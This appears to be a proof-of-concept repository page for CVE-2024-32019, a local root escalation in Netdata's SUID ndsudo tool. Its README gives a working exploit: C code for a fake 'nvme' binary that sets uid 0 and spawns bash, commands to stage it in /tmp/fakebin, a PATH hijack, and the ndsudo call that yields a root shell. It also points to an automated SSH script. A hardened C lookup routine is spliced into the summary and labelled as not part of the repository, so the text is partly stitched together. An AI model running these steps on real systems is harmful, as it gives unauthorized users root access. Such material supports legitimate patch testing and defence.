CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Readme
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.
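
For contrast, the hardened form of the lookup described above, as an added example (not Netdata's code and not part of this repository): a privileged helper resolves the command against a fixed directory list, never reads the caller's `PATH`, and executes by absolute path with a clean environment. The directory list, the environment contents and the function names `is_trusted_file`, `resolve_trusted` and `run_trusted` are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* setenv, mkdtemp, S_IF* under strict -std modes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed trusted directories; a real helper would pin these at build time. */
static const char *const TRUSTED_DIRS[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };

/* Minimal environment handed to the child instead of the caller's own. */
static char *const CLEAN_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", "LC_ALL=C", NULL };

/* Accept only a regular, root-owned, owner-executable file that neither
 * group nor others can modify. */
int is_trusted_file(const struct stat *st) {
    return S_ISREG(st->st_mode) && st->st_uid == 0 &&
           (st->st_mode & S_IXUSR) != 0 &&
           (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Resolve a bare command name against TRUSTED_DIRS only. The caller's PATH
 * is never consulted. Returns 0 and fills `out` on success, -1 otherwise. */
int resolve_trusted(const char *name, char *out, size_t outlen) {
    struct stat st;
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;                      /* bare names only: no paths, no traversal */
    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen)
            continue;                   /* would not fit: skip, never truncate */
        if (stat(out, &st) == 0 && is_trusted_file(&st))
            return 0;
    }
    if (outlen > 0)
        out[0] = '\0';                  /* leave no stale candidate behind */
    return -1;
}

/* Execute the resolved program by absolute path with the clean environment. */
int run_trusted(const char *name, char *const argv[]) {
    char path[4096];
    if (resolve_trusted(name, path, sizeof path) != 0)
        return -1;
    execve(path, argv, CLEAN_ENV);
    return -1;                          /* only reached if execve failed */
}
```
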

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have SSH access to the target, you can use `CVE-2024-32019-dbs.py` to automate these steps.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019: Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)

File Snapshot

```
[4.0K] /data/pocs/7aa722bd1472cb681ee868e1183b2f4a31cf49dc
├── [9.5K] CVE-2024-32019-dbs.py
├── [4.0K] images
│   └── [203K] image.png
└── [2.6K] README.md

1 directory, 3 files
```